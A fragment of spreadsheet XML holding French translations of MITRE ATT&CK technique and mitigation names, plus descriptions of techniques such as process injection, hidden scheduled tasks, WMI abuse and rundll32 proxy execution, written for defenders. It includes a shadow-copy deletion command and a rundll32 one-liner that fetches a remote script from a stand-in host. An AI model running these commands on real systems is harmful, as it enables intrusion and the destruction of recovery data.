    <t>Injection de modèle</t>
  </si>
  <si>
    <t>Manipulation du jeton d’accès</t>
  </si>
  <si>
    <t>Interception de l’authentification multifacteur</t>
  </si>
  <si>
    <t>Emballage de logiciels</t>
  </si>
  <si>
    <t>Protocoles Web</t>
  </si>
  <si>
    <t>Visuel de base</t>
  </si>
  <si>
    <t>Système de fichiers caché</t>
  </si>
  <si>
    <t>Détournement de RDP</t>
  </si>
  <si>
    <t>Créer un compte</t>
  </si>
  <si>
    <t>Entrées XDG Autostart</t>
  </si>
  <si>
    <t>Découverte de services cloud</t>
  </si>
  <si>
    <t>Découverte du système à distance</t>
  </si>
  <si>
    <t>Découverte des services réseau</t>
  </si>
  <si>
    <t>Propriétés du domaine</t>
  </si>
  <si>
    <t>Découverte de logiciels</t>
  </si>
  <si>
    <t>Tableau de bord du service cloud</t>
  </si>
  <si>
    <t>Stockage local d’unité d’exécution</t>
  </si>
  <si>
    <t>Évasion du débogueur</t>
  </si>
  <si>
    <t>Espace après le nom de fichier</t>
  </si>
  <si>
    <t>Demandes rouvertes</t>
  </si>
  <si>
    <t>Empoisonnement SEO</t>
  </si>
  <si>
    <t>Passez le hachage</t>
  </si>
  <si>
    <t>Exfiltration sur support physique</t>
  </si>
  <si>
    <t>Chargement latéral DLL</t>
  </si>
  <si>
    <t>Transfert d’outil d’entrée</t>
  </si>
  <si>
    <t>Autorisations supplémentaires de délégué d’e-mail</t>
  </si>
  <si>
    <t>Exécution sans serveur</t>
  </si>
  <si>
    <t>Appels système Ptrace</t>
  </si>
  <si>
    <t>Paramètres d’alimentation</t>
  </si>
  <si>
    <t>Résolution dynamique de l’API</t>
  </si>
  <si>
    <t>Protocole de bureau à distance</t>
  </si>
  <si>
    <t>Script d’ouverture de session (Windows)</t>
  </si>
  <si>
    <t>ListePlantation</t>
  </si>
  <si>
    <t>Masquer l’infrastructure</t>
  </si>
  <si>
    <t>Modification de la politique du domaine ou du locataire</t>
  </si>
  <si>
    <t>Traitement des scripts XSL</t>
  </si>
  <si>
    <t>Analyser les bases de données</t>
  </si>
  <si>
    <t>Fichiers et répertoires cachés</t>
  </si>
  <si>
    <t>Créer un instantané</t>
  </si>
  <si>
    <t>Déterminer les emplacements physiques</t>
  </si>
  <si>
    <t>Test de bureau</t>
  </si>
  <si>
    <t>Développer les capacités</t>
  </si>
  <si>
    <t>SNMP (vidage MIB)</t>
  </si>
  <si>
    <t>Lien malveillant</t>
  </si>
  <si>
    <t>Jeton d’accès à l’application</t>
  </si>
  <si>
    <t>Pilote LSASS</t>
  </si>
  <si>
    <t>Exécution du service</t>
  </si>
  <si>
    <t>Verrouillage environnemental</t>
  </si>
  <si>
    <t>Canaux de secours</t>
  </si>
  <si>
    <t>Attributs de fichier NTFS</t>
  </si>
  <si>
    <t>Découverte de l’heure système</t>
  </si>
  <si>
    <t>À</t>
  </si>
  <si>
    <t>Injection de bibliothèque de liens dynamiques</t>
  </si>
  <si>
    <t>Modifier le processus d’authentification</t>
  </si>
  <si>
    <t>Règles Udev</t>
  </si>
  <si>
    <t>Accrochage de l’API d’identification</t>
  </si>
  <si>
    <t>Corruption du micrologiciel</t>
  </si>
  <si>
    <t>Inhiber la récupération du système</t>
  </si>
  <si>
    <t>DLL d’aide Netsh</t>
  </si>
  <si>
    <t>Proxy interne</t>
  </si>
  <si>
    <t>Exécution du proxy de script système</t>
  </si>
  <si>
    <t>Résolveur Dead Drop</t>
  </si>
  <si>
    <t>Données indésirables</t>
  </si>
  <si>
    <t>API de conteneur</t>
  </si>
  <si>
    <t>Procédures stockées SQL</t>
  </si>
  <si>
    <t>Authentification des périphériques réseau</t>
  </si>
  <si>
    <t>Effacement du contenu du disque</t>
  </si>
  <si>
    <t>Applications de messagerie</t>
  </si>
  <si>
    <t>Exfiltration via un protocole non C2 non chiffré</t>
  </si>
  <si>
    <t>Détournement de Dylib</t>
  </si>
  <si>
    <t>Rétrograder l’image système</t>
  </si>
  <si>
    <t>Comptes locaux</t>
  </si>
  <si>
    <t>L’exploitation à des fins d’évasion de défense</t>
  </si>
  <si>
    <t>Exécution du proxy Trusted Developer Utilities</t>
  </si>
  <si>
    <t>Arrêt/redémarrage du système</t>
  </si>
  <si>
    <t>Usurpation d’argument de processus</t>
  </si>
  <si>
    <t>Filtres de socket</t>
  </si>
  <si>
    <t>Prévention des intrusions sur le réseau</t>
  </si>
  <si>
    <t>Limiter l’accès aux ressources sur le réseau</t>
  </si>
  <si>
    <t>Stockage de données à distance</t>
  </si>
  <si>
    <t>Filtrer le trafic réseau</t>
  </si>
  <si>
    <t>Restreindre le contenu Web</t>
  </si>
  <si>
    <t>Limiter l’installation de logiciels</t>
  </si>
  <si>
    <t>Conseils pour les développeurs d’applications</t>
  </si>
  <si>
    <t>Limiter l’installation matérielle</t>
  </si>
  <si>
    <t>Formation des utilisateurs</t>
  </si>
  <si>
    <t>Contrôle de compte d’utilisateur</t>
  </si>
  <si>
    <t>Configuration du système d’exploitation</t>
  </si>
  <si>
    <t>Sauvegarde des données</t>
  </si>
  <si>
    <t>Prévention de l’exécution</t>
  </si>
  <si>
    <t>Protection d’accès aux informations d’identification</t>
  </si>
  <si>
    <t>Autorisations des variables d’environnement</t>
  </si>
  <si>
    <t>Prévention des pertes de données</t>
  </si>
  <si>
    <t>Intégrité privilégiée des processus</t>
  </si>
  <si>
    <t>Ne pas atténuer</t>
  </si>
  <si>
    <t>Pré-compromis</t>
  </si>
  <si>
    <t>Intégrité du démarrage</t>
  </si>
  <si>
    <t>Canal de communication hors bande</t>
  </si>
  <si>
    <t>Segmentation du réseau</t>
  </si>
  <si>
    <t>Programme de renseignements sur les menaces</t>
  </si>
  <si>
    <t>Politiques de mot de passe</t>
  </si>
  <si>
    <t>Prévention du comportement sur Endpoint</t>
  </si>
  <si>
    <t>Gestion des comptes d’utilisateur</t>
  </si>
  <si>
    <t>Restreindre les autorisations de fichiers et de répertoires</t>
  </si>
  <si>
    <t>Gestion des comptes privilégiés</t>
  </si>
  <si>
    <t>Restreindre les autorisations du registre</t>
  </si>
  <si>
    <t>Authentification multifactorielle</t>
  </si>
  <si>
    <t>Configuration logicielle</t>
  </si>
  <si>
    <t>Isolation des applications et sandboxing</t>
  </si>
  <si>
    <t>Protection contre les exploits</t>
  </si>
  <si>
    <t>Configuration d’Active Directory</t>
  </si>
  <si>
    <t>Mettre à jour le logiciel</t>
  </si>
  <si>
    <t>Limiter le chargement de la bibliothèque</t>
  </si>
  <si>
    <t>Désactiver ou supprimer une fonctionnalité ou un programme</t>
  </si>
  <si>
    <t>Politiques d’utilisation du compte</t>
  </si>
  <si>
    <t>Chiffrer les informations sensibles</t>
  </si>
  <si>
    <t>Les adversaires peuvent injecter du code malveillant dans le processus via Extra Window Memory (EWM) afin d’échapper aux défenses basées sur les processus et éventuellement d’élever les privilèges. L’injection EWM est une méthode d’exécution de code arbitraire dans l’espace d’adressage d’un processus en direct distinct. 
Avant de créer une fenêtre, les processus graphiques basés sur Windows doivent prescrire ou enregistrer une classe windows, qui stipule l’apparence et le comportement (via les procédures windows, qui sont des fonctions qui gèrent l’entrée/sortie de données). (Citation : Classes de fenêtre Microsoft) L’inscription de nouvelles classes Windows peut inclure une demande d’ajout d’un maximum de 40 octets d’EWM à la mémoire allouée de chaque instance de cette classe. Cet EWM est destiné à stocker des données spécifiques à cette fenêtre et dispose de fonctions d’interface de programmation d’application (API) spécifiques pour définir et obtenir sa valeur. (Citation : Fonction Microsoft GetWindowLong) (Citation : Fonction Microsoft SetWindowLong)
Bien que petit, l’EWM est suffisamment grand pour stocker un pointeur 32 bits et est souvent utilisé pour pointer vers une procédure Windows. Les logiciels malveillants peuvent éventuellement utiliser cet emplacement mémoire dans le cadre d’une chaîne d’attaque qui comprend l’écriture de code dans des sections partagées de la mémoire du processus, la mise en place d’un pointeur vers le code dans EWM, puis l’appel de l’exécution en renvoyant le contrôle d’exécution à l’adresse dans l’EWM du processus.
L’exécution accordée par l’injection EWM peut permettre l’accès à la mémoire du processus cible et éventuellement à des privilèges élevés. L’écriture de charges utiles dans des sections partagées évite également l’utilisation d’appels d’API hautement surveillés tels que &lt;code&gt;WriteProcessMemory&lt;/code&gt; et &lt;code&gt;CreateRemoteThread&lt;/code&gt;. (Citation : Injection de processus élastique juillet 2017) Des échantillons de logiciels malveillants plus sophistiqués peuvent également contourner les mécanismes de protection tels que la prévention de l’exécution des données (DEP) en déclenchant une combinaison de procédures Windows et d’autres fonctions système qui réécriront la charge utile malveillante à l’intérieur d’une partie exécutable du processus cible.  (Citation : MalwareTech Power Loader août 2013) (Citation : WeLiveSecurity Gapz et Redyms mars 2013)
L’exécution de code dans le contexte d’un autre processus peut permettre d’accéder à la mémoire du processus, aux ressources système/réseau et éventuellement à des privilèges élevés. L’exécution par injection EWM peut également échapper à la détection des produits de sécurité, car l’exécution est masquée par un processus légitime.
https://attack.mitre.org/techniques/T1055/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser du planificateur de tâches Windows pour effectuer la planification de tâches pour l’exécution initiale ou récurrente de code malveillant. Il existe plusieurs façons d’accéder au planificateur de tâches dans Windows. L’utilitaire [schtasks](https://attack.mitre.org/software/S0111) peut être exécuté directement sur la ligne de commande, ou le planificateur de tâches peut être ouvert via l’interface graphique dans la section Outils d’administration du Panneau de configuration. (Citation : débordement de pile) Dans certains cas, les adversaires ont utilisé un wrapper .NET pour le planificateur de tâches Windows, tandis que les adversaires ont utilisé la bibliothèque Windows netapi32 et [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) (WMI) pour créer une tâche planifiée. Les adversaires peuvent également utiliser l’applet de commande Powershell « Invoke-CimMethod », qui exploite la classe WMI « PS_ScheduledTask pour créer une tâche planifiée via un chemin d’accès XML. (Citation : Red Canary - Atomic Red Team)
Un adversaire peut utiliser le Planificateur de tâches Windows pour exécuter des programmes au démarrage du système ou de manière planifiée à des fins de persistance. Le planificateur de tâches Windows peut également être utilisé de manière abusive pour effectuer une exécution à distance dans le cadre d’un mouvement latéral et/ou pour exécuter un processus dans le contexte d’un compte spécifié (tel que SYSTEM). À l’instar de [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), les adversaires ont également abusé du planificateur de tâches Windows pour masquer potentiellement l’exécution unique dans le cadre de processus système signés/approuvés. (Citation : ProofPoint Serpent)
Les adversaires peuvent également créer des tâches planifiées « cachées » (c’est-à-dire [Masquer les artefacts](https://attack.mitre.org/techniques/T1564)) qui peuvent ne pas être visibles par les outils de défense et les requêtes manuelles utilisées pour énumérer les tâches. Plus précisément, un adversaire peut masquer une tâche à l’adresse « schtasks /query » et au planificateur de tâches en supprimant la valeur de registre du descripteur de sécurité (SD) associée (lorsque la suppression de cette valeur doit être effectuée à l’aide des autorisations SYSTEM). (Citation : SigmaHQ)(Citation : Tâche planifiée de Tarrask) Les adversaires peuvent également utiliser d’autres méthodes pour masquer des tâches, telles que la modification des métadonnées (par exemple, la valeur « Index ») dans les clés de registre associées. (Citation : Défense contre les attaques de tâches planifiées dans les environnements Windows)
https://attack.mitre.org/techniques/T1053/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent attacher des filtres à une prise réseau pour surveiller, puis activer des portes dérobées utilisées pour la persistance ou la commande et le contrôle. Avec des autorisations élevées, les adversaires peuvent utiliser des fonctionnalités telles que la bibliothèque « libpcap » pour ouvrir des sockets et installer des filtres afin d’autoriser ou d’interdire à certains types de données de passer par le socket. Le filtre peut s’appliquer à tout le trafic passant par l’interface réseau spécifiée (ou à toutes les interfaces si non spécifiées). Lorsque l’interface réseau reçoit un paquet correspondant aux critères de filtrage, des actions supplémentaires peuvent être déclenchées sur l’hôte, telles que l’activation d’un shell inverse.
Pour établir une connexion, un adversaire envoie un paquet contrefait à l’hôte ciblé qui correspond aux critères de filtre installés. (Citation : haking9 libpcap reniflage du réseau) Des adversaires ont utilisé ces filtres de socket pour déclencher l’installation d’implants, effectuer des retours ping et invoquer des shells de commande. La communication avec ces filtres de socket peut également être utilisée conjointement avec le [Protocol Tunneling](https://attack.mitre.org/techniques/T1572). (Citation : filtres exatrack bpf portes dérobées passives)(Citation : Leonardo Turla Penquin, mai 2020)
Les filtres peuvent être installés sur n’importe quelle plate-forme de type Unix avec 'libpcap' installé ou sur des hôtes Windows utilisant 'Winpcap'.  Les adversaires peuvent utiliser soit 'libpcap' avec 'pcap_setfilter', soit la fonction de bibliothèque standard 'setsockopt' avec les options 'SO_ATTACH_FILTER. Étant donné que la connexion de socket n’est pas active tant que le paquet n’est pas reçu, ce comportement peut être difficile à détecter en raison de l’absence d’activité sur un hôte, d’une faible surcharge de processeur et d’une visibilité limitée sur l’utilisation brute du socket.
https://attack.mitre.org/techniques/T1205/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des utilitaires pour compresser et/ou chiffrer les données collectées avant l’exfiltration. De nombreux utilitaires incluent des fonctionnalités permettant de compresser, de chiffrer ou d’empaqueter les données dans un format plus facile et plus sûr à transporter.
Les adversaires peuvent abuser de divers utilitaires pour compresser ou crypter les données avant de les exfiltrer. Certains utilitaires tiers peuvent être préinstallés, tels que &lt;code&gt;tar&lt;/code&gt; sur Linux et macOS ou &lt;code&gt;zip&lt;/code&gt; sur les systèmes Windows. 
Sous Windows, &lt;code&gt;diantz&lt;/code&gt; ou &lt;code&gt; makecab&lt;/code&gt; peuvent être utilisés pour empaqueter les fichiers collectés dans un fichier armoire (.cab). &lt;code&gt;diantz&lt;/code&gt; peut également être utilisé pour télécharger et compresser des fichiers à partir d’emplacements distants (c’est-à-dire [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)). (Référence : diantz.exe_lolbas) &lt;code&gt;xcopy&lt;/code&gt; sous Windows peut copier des fichiers et des répertoires avec une variété d’options. De plus, les adversaires peuvent utiliser [certutil](https://attack.mitre.org/software/S0160) pour encoder en Base64 les données collectées avant l’exfiltration. 
Les adversaires peuvent également utiliser des utilitaires tiers, tels que 7-Zip, WinRAR et WinZip, pour effectuer des activités similaires. (Citation : page d’accueil 7zip)(Citation : Page d’accueil de WinRAR)(Citation : Page d’accueil de WinZip)
https://attack.mitre.org/techniques/T1560/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser [Comptes valides](https://attack.mitre.org/techniques/T1078) pour contrôler à distance des machines à l’aide de l’informatique de réseau virtuel (VNC).  VNC est un système de partage de bureau indépendant de la plate-forme qui utilise le protocole RFB (« remote framebuffer ») pour permettre aux utilisateurs de contrôler à distance l’affichage d’un autre ordinateur en relayant les entrées d’écran, de souris et de clavier sur le réseau. (Citation : Le protocole Framebuffer à distance)
VNC diffère du [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) car VNC est un logiciel de partage d’écran plutôt qu’un logiciel de partage de ressources. Par défaut, VNC utilise l’authentification du système, mais il peut être configuré pour utiliser des informations d’identification spécifiques à VNC. (Citation : Logiciel MacOS VNC pour le bureau à distance)(Citation : Authentification VNC)
Les adversaires peuvent abuser de VNC pour effectuer des actions malveillantes en tant qu’utilisateur connecté, telles que l’ouverture de documents, le téléchargement de fichiers et l’exécution de commandes arbitraires. Un adversaire pourrait utiliser VNC pour contrôler et surveiller à distance un système afin de collecter des données et des informations afin de pivoter vers d’autres systèmes au sein du réseau. Des bibliothèques/implémentations VNC spécifiques ont également été sensibles aux attaques par force brute et à l’exploitation de l’utilisation de la mémoire. (Citation : Détournement de VNC)(Citation : Connexion racine macOS VNC sans authentification)(Citation : Vulnérabilités VNC)(Citation : Vérification de l’authentification VNC de sécurité offensive)(Citation : Attaque des serveurs VNC PentestLab)(Citation : Bug d’authentification de La Havane)
https://attack.mitre.org/techniques/T1021/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de Windows Management Instrumentation (WMI) pour exécuter des commandes et des charges utiles malveillantes. WMI est conçu pour les programmeurs et constitue l’infrastructure pour la gestion, les données et les opérations sur les systèmes Windows. (Référence : WMI 1-3) WMI est une fonctionnalité d’administration qui fournit un environnement uniforme pour accéder aux composants du système Windows.
Le service WMI permet un accès local et distant, bien que ce dernier soit facilité par les [Services à distance](https://attack.mitre.org/techniques/T1021) tels que [Modèle objet de composant distribué](https://attack.mitre.org/techniques/T1021/003) et [Gestion à distance Windows](https://attack.mitre.org/techniques/T1021/006). (Référence : WMI 1-3) WMI distant sur DCOM fonctionne à l’aide du port 135, tandis que WMI sur WinRM fonctionne sur le port 5985 lors de l’utilisation de HTTP et 5986 pour HTTPS. (Référence : WMI 1-3) (Citation : Mandiant WMI)
Un adversaire peut utiliser WMI pour interagir avec des systèmes locaux et distants et l’utiliser comme moyen d’exécuter divers comportements, tels que la collecte d’informations pour [Discovery](https://attack.mitre.org/tactics/TA0007) ainsi que [Execution](https://attack.mitre.org/tactics/TA0002) de commandes et de charges utiles. (Citation : Mandiant WMI) Par exemple, un adversaire peut abuser de 'wmic.exe' pour supprimer des clichés instantanés avec la commande 'wmic.exe Shadowcopy Delete' (c’est-à-dire, [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490)). (Référence : WMI 6)
**Remarque :** 'wmic.exe' est obsolète à partir de janvier 2024, la fonctionnalité WMIC étant « désactivée par défaut » sur Windows 11+. WMIC sera supprimé des versions ultérieures de Windows et remplacé par [PowerShell](https://attack.mitre.org/techniques/T1059/001) en tant qu’interface WMI principale. (Référence : WMI 7,8) En plus de PowerShell et d’outils tels que 'wbemtool.exe', les API COM peuvent également être utilisées pour interagir de manière programmatique avec WMI via C++, .NET, VBScript, etc.
https://attack.mitre.org/techniques/T1047</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de faire des captures d’écran du bureau pour recueillir des informations au cours d’une opération. La fonctionnalité de capture d’écran peut être incluse dans un outil d’accès à distance utilisé dans les opérations post-compromission. Il est également généralement possible de faire une capture d’écran à l’aide d’utilitaires natifs ou d’appels d’API, tels que &lt;code&gt;CopyFromScreen&lt;/code&gt;, &lt;code&gt;xwd&lt;/code&gt; ou &lt;code&gt;capture d’écran&lt;/code&gt;. (Citation : CopyFromScreen .NET)(Citation : Logiciel malveillant Mac obsolète)
https://attack.mitre.org/techniques/T1113</t>
  </si>
  <si>
    <t>Les adversaires peuvent stocker des données dans des formats « sans fichier » pour dissimuler les activités malveillantes aux défenses. Le stockage sans fichier peut être défini de manière générale comme tout format autre qu’un fichier. Parmi les exemples courants de stockage sans fichier non volatile dans les systèmes Windows, citons le registre Windows, les journaux d’événements ou le référentiel WMI. (Citation : Microsoft Fileless)(Citation : SecureList sans fichier) Dans les systèmes Linux, les répertoires de mémoire partagée tels que '/dev/shm', '/run/shm', '/var/run' et '/var/lock' peuvent également être considérés comme du stockage sans fichier, car les fichiers écrits dans ces répertoires sont mappés directement à la RAM et ne sont pas stockés sur le disque. (Citation : Binaire élastique exécuté à partir d’un répertoire de mémoire partagée)(Citation : Akami Frog4Shell 2024)(Citation : Aquasec Muhstik Malware 2024)
À l’instar des comportements en mémoire sans fichier tels que [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) et [Process Injection](https://attack.mitre.org/techniques/T1055), le stockage de données sans fichier peut ne pas être détecté par l’antivirus et d’autres outils de sécurité des terminaux qui ne peuvent accéder qu’à des formats de fichiers spécifiques à partir du stockage sur disque. L’exploitation du stockage sans fichier peut également permettre aux adversaires de contourner les protections offertes par les systèmes de fichiers en lecture seule sous Linux. (Citation : Sysdig Fileless Malware 23022)
Les adversaires peuvent utiliser le stockage sans fichier pour dissimuler divers types de données stockées, y compris les charges utiles/le shellcode (potentiellement utilisés dans le cadre de [Persistance](https://attack.mitre.org/tactics/TA0003)) et les données collectées qui n’ont pas encore été exfiltrées de la victime (par exemple, [Local Data Staging](https://attack.mitre.org/techniques/T1074/001)). De plus, il est fréquent que les adversaires chiffrent, encodent, épissent ou obscurcissent ces données sans fichier lorsqu’elles sont stockées.
Certaines formes d’activité de stockage sans fichier peuvent créer indirectement des artefacts dans le système de fichiers, mais dans des formats centraux et difficiles à inspecter tels que les fichiers physiques WMI (par exemple, ' %SystemRoot %\System32\Wbem\Repository') ou Registre (par exemple, ' %SystemRoot %\System32\Config'). (Citation : Microsoft Fileless)
https://attack.mitre.org/techniques/T1027/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des scripts exécutés automatiquement lors de l’initialisation du démarrage ou de l’ouverture de session pour établir la persistance. (Citation : Mandiant APT29 Eye Spy Email 22 novembre)(Citation : Anomali Rocke, mars 2019) Les scripts d’initialisation peuvent être utilisés pour exécuter des fonctions administratives, qui peuvent souvent exécuter d’autres programmes ou envoyer des informations à un serveur de journalisation interne. Ces scripts peuvent varier en fonction du système d’exploitation et s’ils sont appliqués localement ou à distance.  
Les adversaires peuvent utiliser ces scripts pour maintenir la persistance sur un seul système. Selon la configuration d’accès des scripts d’ouverture de session, des informations d’identification locales ou un compte administrateur peuvent être nécessaires. 
Un adversaire peut également être en mesure d’élever ses privilèges, car certains scripts d’initialisation de démarrage ou d’ouverture de session s’exécutent avec des privilèges plus élevés.
https://attack.mitre.org/techniques/T1037</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de se positionner entre deux ou plusieurs appareils en réseau à l’aide d’une technique AiTM (Adversary-in-the-Middle) pour soutenir des comportements ultérieurs tels que [Network Sniffing](https://attack.mitre.org/techniques/T1040), [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) ou les attaques par rejeu ([Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212)). En abusant des fonctionnalités des protocoles réseau courants qui peuvent déterminer le flux du trafic réseau (par exemple, ARP, DNS, LLMNR, etc.), les adversaires peuvent forcer un appareil à communiquer par le biais d’un système contrôlé par l’adversaire afin de collecter des informations ou d’effectuer des actions supplémentaires. (Citation : Rapid7 MiTM Basics)
Par exemple, les adversaires peuvent manipuler les paramètres DNS de la victime pour permettre d’autres activités malveillantes, telles que l’empêchement/la redirection des utilisateurs pour qu’ils accèdent à des sites légitimes et/ou la diffusion de logiciels malveillants supplémentaires. (Référence : ttint_rat)(Référence : dns_changer_trojans)(Référence : ad_blocker_with_miner) Les adversaires peuvent également manipuler le DNS et exploiter leur position afin d’intercepter les informations d’identification des utilisateurs, y compris les jetons d’accès ([Steal Application Access Token](https://attack.mitre.org/techniques/T1528)) et les cookies de session ([Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)). (Référence : volexity_0day_sophos_FW)(Citation : Tactiques symboliques) [Attaque de rétrogradation]Les (https://attack.mitre.org/techniques/T1562/010)s peuvent également être utilisés pour établir une position AiTM, par exemple en négociant une version moins sécurisée, obsolète ou plus faible du protocole de communication (SSL/TLS) ou de l’algorithme de chiffrement. (Référence : mitm_tls_downgrade_att)(Référence : taxonomy_downgrade_att_tls)(Référence : tlseminar_downgrade_att)
Les adversaires peuvent également tirer parti de la position AiTM pour tenter de surveiller et/ou de modifier le trafic, comme dans [Manipulation de données transmises](https://attack.mitre.org/techniques/T1565/002). Les adversaires peuvent configurer une position similaire à AiTM pour empêcher le trafic de circuler vers la destination appropriée, potentiellement vers [Entraver les défenses](https://attack.mitre.org/techniques/T1562) et/ou à l’appui d’un [Déni de service du réseau](https://attack.mitre.org/techniques/T1498).
https://attack.mitre.org/techniques/T1557</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’identifier l’utilisateur principal, l’utilisateur actuellement connecté, l’ensemble d’utilisateurs qui utilisent couramment un système ou si un utilisateur utilise activement le système. Ils peuvent le faire, par exemple, en récupérant les noms d’utilisateur des comptes ou en utilisant [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Les informations peuvent être collectées de différentes manières à l’aide d’autres techniques de découverte, car les détails de l’utilisateur et du nom d’utilisateur sont répandus dans l’ensemble d’un système et incluent la propriété du processus en cours d’exécution, la propriété des fichiers/répertoires, les informations de session et les journaux système. Les adversaires peuvent utiliser les informations de [Découverte du propriétaire du système/de l’utilisateur](https://attack.mitre.org/techniques/T1033) lors de la découverte automatique pour façonner des comportements ultérieurs, notamment si l’adversaire infecte complètement la cible et/ou tente ou non des actions spécifiques.
Divers utilitaires et commandes peuvent acquérir ces informations, y compris &lt;code&gt;whoami&lt;/code&gt;. Sous macOS et Linux, l’utilisateur actuellement connecté peut être identifié par &lt;code&gt;w&lt;/code&gt; et &lt;code&gt;who&lt;/code&gt;. Sur macOS, la commande &lt;code&gt;dscl . list /Users | grep -v '_'&lt;/code&gt; peut également être utilisée pour énumérer les comptes d’utilisateurs. Les variables &lt;code&gt;d’environnement, telles que %USERNAME %&lt;/code&gt; et &lt;code&gt;$USER&lt;/code&gt;, peuvent également être utilisées pour accéder à ces informations.
Sur les périphériques réseau, les commandes [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) telles que 'show users' et 'show ssh' peuvent être utilisées pour afficher les utilisateurs actuellement connectés au périphérique. (Référence : show_ssh_users_cmd_cisco)(Référence : US-CERT TA18-106A Network Infrastructure Devices 2018)
https://attack.mitre.org/techniques/T1033</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter, louer, louer ou obtenir une infrastructure qui peut être utilisée pendant le ciblage. Il existe une grande variété d’infrastructures pour héberger et orchestrer les opérations de l’adversaire. Les solutions d’infrastructure comprennent des serveurs physiques ou cloud, des domaines et des services Web tiers. (Citation : TrendmicroHideoutsLease) Certains fournisseurs d’infrastructure offrent des périodes d’essai gratuites, ce qui permet d’acquérir des infrastructures à un coût limité ou gratuit. (Citation : Essai gratuit PurpleUrchin) De plus, les botnets sont disponibles à la location ou à l’achat.
L’utilisation de ces solutions d’infrastructure permet aux adversaires de mettre en scène, de lancer et d’exécuter des opérations. Les solutions peuvent aider les opérations de l’adversaire à se fondre dans le trafic considéré comme normal, par exemple en contactant des services Web tiers ou en acquérant une infrastructure pour prendre en charge [Proxy](https://attack.mitre.org/techniques/T1090), y compris à partir de services proxy résidentiels. (Référence : amnesty_nso_pegasus)(Citation : Bourrage d’identifiants par procuration par le FBI)(Référence : Mandiant APT29 Microsoft 365 2022) En fonction de la mise en œuvre, les adversaires peuvent utiliser une infrastructure qui rend difficile la connexion physique à eux, ainsi qu’une infrastructure qui peut être rapidement provisionnée, modifiée et arrêtée.
https://attack.mitre.org/techniques/T1583</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution de code malveillant rundll32.exe à proxy . L’utilisation de rundll32.exe, au lieu de l’exécution directe (c’est-à-dire [Modules partagés](https://attack.mitre.org/techniques/T1129)), peut éviter de déclencher des outils de sécurité qui peuvent ne pas surveiller l’exécution du processus rundll32.exe en raison de listes d’autorisation ou de faux positifs provenant d’opérations normales. Rundll32.exe est généralement associé à l’exécution de charges utiles DLL (ex : &lt;code&gt;rundll32.exe {DLLname, DLLfunction}&lt;/code&gt;).
Rundll32.exe peut également être utilisé pour exécuter des fichiers d’éléments (.cpl) [Panneau de configuration](https://attack.mitre.org/techniques/T1218/002) via les fonctions shell32.dll non documentées &lt;code&gt;Control_RunDLL&lt;/code&gt; et &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-cliquer sur un fichier .cpl entraîne également l’exécution de rundll32.exe. (Citation : Trend Micro CPL) Par exemple, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) peut être envoyé par proxy via Rundll32.exe.
Rundll32 peut également être utilisé pour exécuter des scripts tels que JavaScript. Cela peut être fait en utilisant une syntaxe similaire à celle-ci : &lt;code&gt;rundll32.exe javascript :"\.. \mshtml,RunHTMLApplication " ; document.write() ; GetObject("script :https[ :]//www[.]exemple[.]com/malicious.sct ») »&lt;/code&gt; Ce comportement a été observé utilisé par des logiciels malveillants tels que Poweliks. (Citation : Il s’agit d’une confusion de ligne de commande de sécurité)
Les adversaires peuvent également tenter de masquer le code malveillant de l’analyse en abusant de la manière dont rundll32.exe charge les noms de fonction DLL. Dans le cadre de la prise en charge de la compatibilité Windows pour divers jeux de caractères, rundll32.exe vérifierons d’abord les fonctions larges/Unicode puis les fonctions prises en charge par les caractères ANSI avant de charger la fonction spécifiée (par exemple, étant donné la commande &lt;code&gt;rundll32.exe ExampleDLL.dll, ExampleFunction,&lt;/code&gt; rundll32.exe tenteriez d’abord d’exécuter &lt;code&gt;ExampleFunctionW&lt;/code&gt;, ou à défaut de cette &lt;code&gt;ExampleFunctionA&lt;/code&gt;, avant de charger &lt;code&gt;ExampleFunction&lt;/code&gt;). Les adversaires peuvent donc masquer le code malveillant en créant plusieurs noms de fonctions exportés identiques et en ajoutant &lt;code&gt;W&lt;/code&gt; et/ou &lt;code&gt;A&lt;/code&gt; à des noms inoffensifs. (Citation : Attaquer Rundll32.exe obscurité)(Citation : github noRunDll) Les fonctions DLL peuvent également être exportées et exécutées par un numéro ordinal (ex : &lt;code&gt;rundll32.exe file.dll,#1&lt;/code&gt;).
De plus, les adversaires peuvent utiliser des techniques de masquage(https://attack.mitre.org/techniques/T1036) (telles que la modification des noms de fichiers DLL, des extensions de fichiers ou des noms de fonctions) pour dissimuler davantage l’exécution d’une charge utile malveillante. (Citation : rundll32.exe évasion de la défense)
https://attack.mitre.org/techniques/T1218/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de découvrir des conteneurs et d’autres ressources disponibles dans un environnement de conteneurs. D’autres ressources peuvent inclure des images, des déploiements, des pods, des nœuds et d’autres informations telles que l’état d’un cluster.
Ces ressources peuvent être consultées dans des applications web telles que le tableau de bord Kubernetes ou peuvent être interrogées via les API Docker et Kubernetes. (Citation : API Docker)(Citation : API Kubernetes) Dans Docker, les journaux peuvent divulguer des informations sur l’environnement, telles que la configuration de l’environnement, les services disponibles et le fournisseur de cloud que la victime peut utiliser. La découverte de ces ressources peut éclairer les prochaines étapes d’un adversaire dans l’environnement, telles que la façon d’effectuer un mouvement latéral et les méthodes d’exécution à utiliser.
https://attack.mitre.org/techniques/T1613</t>
